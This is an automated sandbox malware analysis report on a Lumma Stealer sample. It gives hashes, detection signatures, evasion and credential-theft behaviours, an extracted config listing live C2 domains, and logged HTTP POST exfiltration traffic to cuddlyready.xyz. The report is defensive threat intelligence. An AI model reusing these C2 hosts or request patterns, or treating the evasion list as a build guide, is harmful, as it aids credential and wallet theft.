
Windows Analysis Report
FjFeChttqA.exe

Overview

General Information

Sample name: FjFeChttqA.exe (renamed because original name is a hash value)
Original sample name: e21681ef00ebfaee22cd2137a1349de0.exe
Analysis ID: 1579752
MD5: e21681ef00ebfaee22cd2137a1349de0
SHA1: 0159be57037eff8abb75c7c241d74f3c6d664739
SHA256: d4acd1d3bf333f1c82682d9dde01e983efb126548bea388ec3adddbedbbc094c
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • FjFeChttqA.exe (PID: 5568 cmdline: "C:\Users\user\Desktop\FjFeChttqA.exe" MD5: E21681EF00EBFAEE22CD2137A1349DE0)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["supporse-comment.cyou", "steppriflej.xyz", "sendypaster.xyz", "pollution-raker.cyou", "ripe-blade.cyou", "greywe-snotty.cyou", "hosue-billowy.cyou", "smash-boiling.cyou", "cuddlyready.xyz"], "Build id": "LOGS11--LiveTraffic"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.2201737747.00000000018D0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2181449137.00000000018D0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2180512483.00000000018B8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2180442038.0000000001923000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2201681034.00000000018B8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T08:35:08.458441+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:10.457322+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:12.837500+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:15.206047+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:17.578298+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:20.274938+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:22.759800+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:27.066778+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49722 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:09.233152+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:11.233480+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:09.233152+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:11.233480+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:13.877851+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49706 | 172.67.150.173 | 443 | TCP

AV Detection

Source: FjFeChttqA.exe | Avira: detected
Source: FjFeChttqA.exe.5568.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["supporse-comment.cyou", "steppriflej.xyz", "sendypaster.xyz", "pollution-raker.cyou", "ripe-blade.cyou", "greywe-snotty.cyou", "hosue-billowy.cyou", "smash-boiling.cyou", "cuddlyready.xyz"], "Build id": "LOGS11--LiveTraffic"}
Source: FjFeChttqA.exe | Virustotal: Detection: 67%
Source: FjFeChttqA.exe | ReversingLabs: Detection: 63%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: FjFeChttqA.exe | Joe Sandbox ML: detected
Source: FjFeChttqA.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Directory queried: number of queries: 1001

Networking
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49706 -> 172.67.150.173:443
Source: Malware configuration extractor | URLs: supporse-comment.cyou
Source: Malware configuration extractor | URLs: steppriflej.xyz
Source: Malware configuration extractor | URLs: sendypaster.xyz
Source: Malware configuration extractor | URLs: pollution-raker.cyou
Source: Malware configuration extractor | URLs: ripe-blade.cyou
Source: Malware configuration extractor | URLs: greywe-snotty.cyou
Source: Malware configuration extractor | URLs: hosue-billowy.cyou
Source: Malware configuration extractor | URLs: smash-boiling.cyou
Source: Malware configuration extractor | URLs: cuddlyready.xyz
Source: DNS query: cuddlyready.xyz
Source: Joe Sandbox View | IP Address: 172.67.150.173
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.150.173:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 53 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=5JA9ZIPKI4NUP0SN8PW | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12847 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=HBCJQNWC | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15023 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XIB13SBIMPZZOTJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20555 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=7QDMMQOYHL4WJ9T | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1243 | Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=8CDCBNTIAV9KNB81 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 570768 | Host: cuddlyready.xyz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: cuddlyready.xyz
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: cuddlyready.xyz
Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: FjFeChttqA.exe, 00000000.00000003.2201737747.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2180512483.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262304891.000000000190B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: FjFeChttqA.exe, 00000000.00000003.2176838867.0000000006031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: FjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: FjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: FjFeChttqA.exe, 00000000.00000003.2176838867.0000000006031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: FjFeChttqA.exe, 00000000.00000003.2262271308.000000000193D000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018B9000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz/
Source: FjFeChttqA.exe, 00000000.00000003.2130098244.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2130210926.00000000060B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz/-
Source: FjFeChttqA.exe, FjFeChttqA.exe, 00000000.00000003.2256614843.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262452656.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2201607264.0000000006032000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018D1000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256517204.0000000006032000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2176838867.0000000006031000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262372697.0000000006032000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz/api
Source: FjFeChttqA.exe, 00000000.00000003.2262452656.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz/apiP
Source: FjFeChttqA.exe, 00000000.00000003.2256614843.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262452656.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018D1000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz/apip
Source: FjFeChttqA.exe, 00000000.00000002.2264551472.000000000193D000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262271308.000000000193D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz/d
Source: FjFeChttqA.exe, 00000000.00000003.2219245311.000000000193D000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256430845.000000000193D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz/pi_3
Source: FjFeChttqA.exe, 00000000.00000003.2219245311.000000000193D000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256430845.000000000193D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz/uo
Source: FjFeChttqA.exe, 00000000.00000003.2130273838.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2130098244.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2130237981.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2130380012.00000000060B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz:443/api
Source: FjFeChttqA.exe, 00000000.00000003.2201737747.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264473271.000000000190E000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2180512483.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262304891.000000000190B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz:443/apiBitwardeoo
Source: FjFeChttqA.exe, 00000000.00000003.2152897561.00000000060AE000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2153363662.00000000060B1000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2153298146.00000000060AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz:443/apil
Source: FjFeChttqA.exe, 00000000.00000003.2201737747.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264473271.000000000190E000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262304891.000000000190B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz:443/apint
Source: FjFeChttqA.exe, 00000000.00000002.2264473271.000000000190E000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262304891.000000000190B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cuddlyready.xyz:443/apizchhhv.default-release/key4.dbPK
Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: FjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2176838867.0000000006031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: FjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: FjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
